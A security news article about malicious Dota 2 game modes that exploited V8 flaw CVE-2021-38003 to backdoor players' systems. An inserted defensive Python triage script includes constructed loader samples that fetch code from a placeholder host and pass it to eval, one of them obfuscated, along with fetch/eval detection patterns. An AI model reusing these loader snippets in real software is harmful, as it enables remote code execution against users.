
Hackers Create Malicious Dota 2 Game Modes to Secretly Access Players’ Systems

Feb 13, 2023 | Ravie Lakshmanan | Game Hacking / Cyber Threat

[Image: Dota 2 Game Modes]

An unknown threat actor created malicious game modes for the
Dota 2 multiplayer online battle arena (MOBA) video game that could
have been exploited to establish backdoor access to players’
systems.

The modes exploited a high-severity flaw[1]
in the V8 JavaScript engine tracked as CVE-2021-38003[2]
(CVSS score: 8.8), which was exploited as a zero-day[3]
and addressed by Google in October 2021.

“Since V8 was not sandboxed in Dota, the exploit on its own
allowed for remote code execution against other Dota players,”
Avast researcher Jan Vojtěšek said[4]
in a report published last week.

Following responsible disclosure to Valve, the game publisher
shipped fixes[5]
on January 12, 2023, by upgrading the version of V8.

Game modes are essentially custom capabilities[6] that can either
augment an existing title or offer completely new gameplay in a manner
that deviates from the standard rules.

While publishing a custom game mode to the Steam store includes
a vetting process from Valve, the malicious game modes discovered
by the antivirus vendor managed to slip through the cracks.

These game modes, which have since been taken down, are “test
addon plz ignore,” “Overdog no annoying heroes,” “Custom Hero
Brawl,” and “Overthrow RTZ Edition X10 XP.” The threat actor is
also said to have published a fifth game mode named “Brawl in Petah
Tiqwa” that did not pack any rogue code.

Embedded inside “test addon plz ignore” is an exploit for the V8
flaw that could be weaponized to execute custom shellcode.

The three others, on the other hand, take a more covert approach
in that the malicious code is designed to reach out to a remote
server to fetch a JavaScript payload. That payload is likely another
exploit for CVE-2021-38003, although this could not be confirmed
because the server is no longer reachable.
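The loader shape described above, a script that pulls text from a remote server and hands it straight to the JavaScript engine, is something a reviewer vetting custom content can look for statically. The following is an added example, not code from Avast, Valve or the article: a small Python triage script that scans JavaScript for network sources and dynamic-execution sinks and only raises a "suspicious" verdict when both occur together. The three sample scripts are constructed stand-ins, not the real game-mode code, and the source list uses generic browser-style API names; the actual Panorama API names used by Dota 2 modes are not given in the article and would need to be added to that list.

```python
"""Static triage for custom game-mode scripts: flag JavaScript that both
fetches remote content and executes code dynamically.

Added example, not Avast's or Valve's tooling. All sample scripts below are
constructed for illustration."""
import re
from dataclasses import dataclass, field

# Sources: calls that can pull data or code from a remote server.
# Generic browser-style names; engine-specific network APIs (assumption:
# Dota 2's Panorama layer has its own) would be added here.
REMOTE_FETCH = {
    "fetch": re.compile(r"\bfetch\s*\("),
    "XMLHttpRequest": re.compile(r"\bXMLHttpRequest\b"),
    "script-src": re.compile(r"\.src\s*=\s*['\"]https?://"),
}
# Sinks: ways of turning a string into executable code.
DYNAMIC_EXEC = {
    "eval": re.compile(r"\beval\s*\("),
    "Function": re.compile(r"\bnew\s+Function\s*\("),
    "timer-string": re.compile(r"\bset(?:Timeout|Interval)\s*\(\s*['\"]"),
}
# Computed member access built from string concatenation, e.g. window["ev" + "al"],
# which hides a sink name from a naive grep. Treated as an exec-class hint.
OBFUSCATED_MEMBER = re.compile(r"\[\s*['\"][^'\"]*['\"]\s*\+")


@dataclass
class Finding:
    line: int
    kind: str   # "fetch" or "exec"
    name: str   # which pattern matched
    text: str   # the offending line, stripped


@dataclass
class Report:
    findings: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        kinds = {f.kind for f in self.findings}
        if "fetch" in kinds and "exec" in kinds:
            return "suspicious"   # remote-loader shape: fetch, then execute
        if "exec" in kinds:
            return "review"       # dynamic execution alone merits a look
        return "clean"


def scan_script(source: str) -> Report:
    """Line-oriented scan; line comments are skipped, block comments are not handled."""
    report = Report()
    for lineno, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("//"):
            continue
        for name, pat in REMOTE_FETCH.items():
            if pat.search(line):
                report.findings.append(Finding(lineno, "fetch", name, stripped))
        for name, pat in DYNAMIC_EXEC.items():
            if pat.search(line):
                report.findings.append(Finding(lineno, "exec", name, stripped))
        if OBFUSCATED_MEMBER.search(line):
            report.findings.append(Finding(lineno, "exec", "computed-member", stripped))
    return report


# Constructed sample 1: fetches a leaderboard and only parses it as JSON.
BENIGN = """
// Constructed: remote data, but never executed as code.
fetch("https://example.invalid/leaderboard.json")
  .then(r => r.json())
  .then(data => renderBoard(data));
"""

# Constructed sample 2: the loader shape, text from a server straight into eval.
LOADER = """
// Constructed stand-in for a stage-two loader.
// (not the real game-mode code)
fetch("https://example.invalid/stage2.js")
  .then(r => r.text())
  .then(code => eval(code));
"""

# Constructed sample 3: same shape with the sink name split to dodge a grep.
OBFUSCATED = """
// Constructed: XMLHttpRequest plus a computed member access.
var x = new XMLHttpRequest();
x.open("GET", "https://example.invalid/p");
x.onload = function () { window["ev" + "al"](x.responseText); };
x.send();
"""

if __name__ == "__main__":
    for label, src in [("benign", BENIGN), ("loader", LOADER), ("obfuscated", OBFUSCATED)]:
        r = scan_script(src)
        print(f"{label}: {r.verdict}")
        for f in r.findings:
            print(f"  line {f.line}: {f.kind}/{f.name}: {f.text}")
```

The point of requiring both a source and a sink before escalating is to keep the false-positive rate workable: plenty of legitimate modes fetch JSON, and a handful use `new Function` for templating, but the combination within one script is the shape of a remote loader and is what deserves a manual look. Regex triage like this is a screening step, not proof; a minified or heavily obfuscated script can still evade it, which is why it reports "review" rather than "clean" whenever any exec-class sink appears.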

In a hypothetical attack scenario, a player launching one of the
above game modes could be targeted by the threat actor to achieve
remote access to the infected host and deploy additional malware
for further exploitation.

It’s not immediately known what the developer’s end goals were
behind creating the game modes, but they are unlikely to be for
benign research purposes, Avast noted.

“First, the attacker did not report the vulnerability to Valve
(which would generally be considered a nice thing to do),” Vojtěšek
said. “Second, the attacker tried to hide the exploit in a stealthy
backdoor.”

“Regardless, it’s also possible that the attacker didn’t have
purely malicious intentions either, since such an attacker could
arguably abuse this vulnerability with a much larger impact.”


References

1. high-severity flaw (starlabs.sg)
2. CVE-2021-38003 (nvd.nist.gov)
3. exploited as a zero-day (thehackernews.com)
4. said (decoded.avast.io)
5. shipped fixes (www.dota2.com)
6. custom capabilities (dota2.fandom.com)
7. Twitter (twitter.com)
8. LinkedIn (www.linkedin.com)
